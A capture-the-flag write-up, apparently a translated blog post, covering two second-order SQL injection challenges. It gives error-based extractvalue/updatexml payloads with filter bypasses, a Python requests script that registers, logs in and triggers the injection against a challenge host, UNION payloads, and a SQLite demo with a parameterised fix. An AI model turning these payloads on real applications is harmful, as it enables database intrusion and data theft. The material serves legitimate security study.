Keep creating, keep growing! This is day 23 of my participation in the Juejin Daily New Plan · June Update Challenge.
[RCTF2015]EasySQL
Two pages, register and login, so the guess is that a second-order injection is lurking.
Testing confirms it: register a user named admin" and then do anything on the change-password page, and the server throws a SQL error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" and pwd='202cb962ac59075b964b07152d234b70'' at line 1
That is the injection point. From the error text (note the double quote around admin and the single quotes around the md5 hash; 202cb962ac59075b964b07152d234b70 is md5('123')), the statement is roughly
update <table> set pwd='<md5(new)>' where username="<name>" and pwd='<md5(old)>'
Next is error-based injection. Testing shows the registered username is filtered for spaces, and, or and the /* comment.
Spaces are bypassed by wrapping every token in parentheses (), and and/or are bypassed with && and || respectively.
Test payload:
admin"||extractvalue(1,concat(0x7e,user(),0x7e))#
The error message echoes the result of user(), so the channel works.
admin"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),0x7e))#
name,pwd,email,real_flag_1s_her
So the flag is in the users table, but the last column name is cut off: the XPATH syntax error only shows 32 characters, and "~name,pwd,email,real_flag_1s_her" is exactly 32 including the leading ~.
Trying mid, substr, left and right to pull out the characters that did not fit fails, because those functions are filtered too.
The trick tested here is to use regexp in the WHERE clause to narrow the result to just the row you want, so it fits inside the window, like
select * from test where name regexp '^r'
Applied to information_schema.columns (note that && must be sent URL-encoded as %26%26, otherwise the form body is split at the &):
admin"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)=('users')%26%26(column_name)regexp('^r')),0x7e))#
real_flag_1s_here
Rows whose value starts with f give the first 31 characters of the flag:
admin"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),0x7e))#
The reverse() function reverses a string, so wrapping the same subquery in reverse() shows the tail of the flag inside the same 32-character window:
admin"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),0x7e))#
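The reasoning behind the two payloads, as an added example that is not part of the original write-up: it models the 32-character window of the MySQL XPATH error, shows what the plain query and the reverse() query each leak, and stitches the two windows back together on their overlap. The uuid flags are the two reported on this page; the other inputs are constructed, and the window size is the MySQL limit the write-up relies on.

```python
# Added example (not from the write-up): model of the extractvalue()/updatexml()
# error channel and of the reverse() trick used to read past its 32-char limit.
from typing import Optional

XPATH_ERROR_LIMIT = 32                       # chars MySQL quotes in "XPATH syntax error: '...'"
MARKER = "~"                                 # the 0x7e wrapped around the value in the payloads
WINDOW = XPATH_ERROR_LIMIT - len(MARKER)     # 31 chars of real data per query


def xpath_error_view(value: str) -> str:
    """What the error message quotes for extractvalue(1, concat(0x7e, value, 0x7e))."""
    return (MARKER + value + MARKER)[:XPATH_ERROR_LIMIT]


def leak(value: str) -> str:
    """Data recovered from one query: drop the leading marker; if the trailing
    marker is visible too, the whole value fitted, so drop that as well."""
    text = xpath_error_view(value)[len(MARKER):]
    return text[:-len(MARKER)] if text.endswith(MARKER) else text


def leak_front(value: str) -> str:
    """The regexp('^f') payload: the first WINDOW characters of the value."""
    return leak(value)


def leak_back(value: str) -> str:
    """The same payload wrapped in reverse(): the last WINDOW characters,
    un-reversed here so it reads naturally."""
    return leak(value[::-1])[::-1]


def merge_on_overlap(front: str, back: str) -> Optional[str]:
    """Join on the longest suffix of `front` that is a prefix of `back`.
    None when they share nothing, i.e. the value is too long for two windows.
    Assumes the true overlap is the longest match, which holds for uuid-like data."""
    for k in range(min(len(front), len(back)), 0, -1):
        if front[-k:] == back[:k]:
            return front + back[k:]
    return None


def recover_via_error_channel(value: str) -> Optional[str]:
    """Drive both queries against `value` and stitch the result, as the write-up does."""
    front = leak_front(value)
    if len(front) < WINDOW:                  # trailing marker was seen: one query sufficed
        return front
    return merge_on_overlap(front, leak_back(value))


if __name__ == "__main__":
    # Constructed sample: the flag reported in the script's comments on this page.
    flag = "flag{eb26f47a-f027-4870-a3de-24145d7e6fa4}"
    print("front :", leak_front(flag))
    print("back  :", leak_back(flag))
    print("merged:", recover_via_error_channel(flag))
```

A flag{<uuid>} value is 42 characters, so the two 31-character windows overlap by 20 characters and the merge is unambiguous; once a value is longer than 61 characters the windows no longer touch and the trick needs a third cut (for example a regexp on a middle fragment), which the page's filter on substr/mid rules out.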
That finishes the challenge. While searching online I found a script someone had written; pasting it here since it may come in handy later.
import requests

# The instance URL is the script author's; point BASE at your own instance.
BASE = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81'
session = requests.session()

# Dump databases
#name = 'test"||(updatexml(1,concat(0x3a,(select(group_concat(schema_name))from(information_schema.schemata))),1))#'
# Dump tables
#name = 'test"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#'
# Dump column names (the flag column name comes back truncated the first time)
#name = 'test"^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))),1)#'
# Use regexp to get the full column name
#name = 'test"^updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")&&(column_name)regexp("^r"))),1)#'
# Dump the data (the updatexml error shows at most 32 characters, so the other half has to be read separately)
#name = 'mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f"))),1))#'
# Output it again, reversed
name = 'test"^updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f")))),1)#'
#}4af6e7d54142-ed3a-0784-720f-a7
#flag{eb26f47a-f027-4870-a3de-24145d7e6fa4}

# 1. Register with the payload as the username (it is only stored at this point)
data1 = {
    'username': name,
    'password': '123',
    'email': '123'
}
req1 = session.post(BASE + '/register.php', data=data1)
# 2. Log in as that user
data2 = {
    'username': name,
    'password': '123'
}
req2 = session.post(BASE + '/login.php', data=data2)
# 3. Change the password: the UPDATE reuses the stored username, which fires the error-based injection
data3 = {
    'newpass': '1234',
    'oldpass': '123'
}
req3 = session.post(BASE + '/changepwd.php', data=data3)
print(req3.text)
flag{c3b0de7a-8919-49ec-9311-ffe8462851fc}
Concatenate the two halves and that is the flag.
October 2019 Twice SQL Injection
Also a second-order injection, and also a very simple page; a bit easier than the previous one.
The injection is at the registration point (the stored username is reused in a later query); register with:
XINO' union select database() #
XINO' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #
XINO' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
XINO' union select flag from flag #
Run them in order and the flag comes straight out.
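A minimal model of the second-order flow used in this challenge, as an added example that is not the challenge's code: registration stores the payload safely with a bound parameter, and a later page builds a query by concatenating the stored username, so the UNION only fires on the second use. It is written against SQLite so it runs offline, which changes two details from the MySQL target: comments end with -- rather than #, and table metadata is read from sqlite_master rather than information_schema. The users/flag tables and the flag value are constructed for the demo.

```python
# Added example (not from the write-up): second-order SQL injection modelled in
# SQLite, with the vulnerable page beside its parameterised fix.
import sqlite3
from typing import Callable, List

Page = Callable[[sqlite3.Connection, str], List[str]]


def setup_db() -> sqlite3.Connection:
    # Constructed schema: a users table and a flag table, as in the challenge.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT, info TEXT);
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('flag{constructed-sample-value}');
        """
    )
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> None:
    # Registration is parameterised, so the payload is stored verbatim and is
    # harmless here. The bug only fires when the stored value is trusted later,
    # which is what makes it "second order".
    conn.execute(
        "INSERT INTO users (username, password, info) VALUES (?, ?, 'none')",
        (username, password),
    )


def stored_username(conn: sqlite3.Connection, username: str) -> str:
    # Stand-in for "the username of the logged-in session", read back from the
    # database exactly as it was registered.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0]


def info_page_vulnerable(conn: sqlite3.Connection, username: str) -> List[str]:
    # The info page concatenates the stored username into a new query because
    # it "came from the database". The attacker's quote, UNION and trailing
    # comment now become part of the SQL.
    name = stored_username(conn, username)
    sql = f"SELECT info FROM users WHERE username = '{name}'"
    return [row[0] for row in conn.execute(sql)]


def info_page_fixed(conn: sqlite3.Connection, username: str) -> List[str]:
    # Same page with a bound parameter: the stored value is compared as data
    # and the UNION never reaches the parser.
    name = stored_username(conn, username)
    return [row[0] for row in conn.execute(
        "SELECT info FROM users WHERE username = ?", (name,)
    )]


def second_order(payload: str, page: Page) -> List[str]:
    """Fresh database, register with `payload` as the username, then visit the page."""
    conn = setup_db()
    register(conn, payload, "123")
    return page(conn, payload)


if __name__ == "__main__":
    # The write-up's three steps, translated to SQLite syntax.
    for payload in (
        "XINO' union select group_concat(name) from sqlite_master where type='table' --",
        "XINO' union select sql from sqlite_master where name='flag' --",
        "XINO' union select flag from flag --",
    ):
        print(second_order(payload, info_page_vulnerable))
    print(second_order("XINO' union select flag from flag --", info_page_fixed))
```

The fix is not input filtering at registration (the value is legitimately stored there) but binding the stored value when it is used again; any place that rebuilds SQL from data read out of the database needs the same treatment.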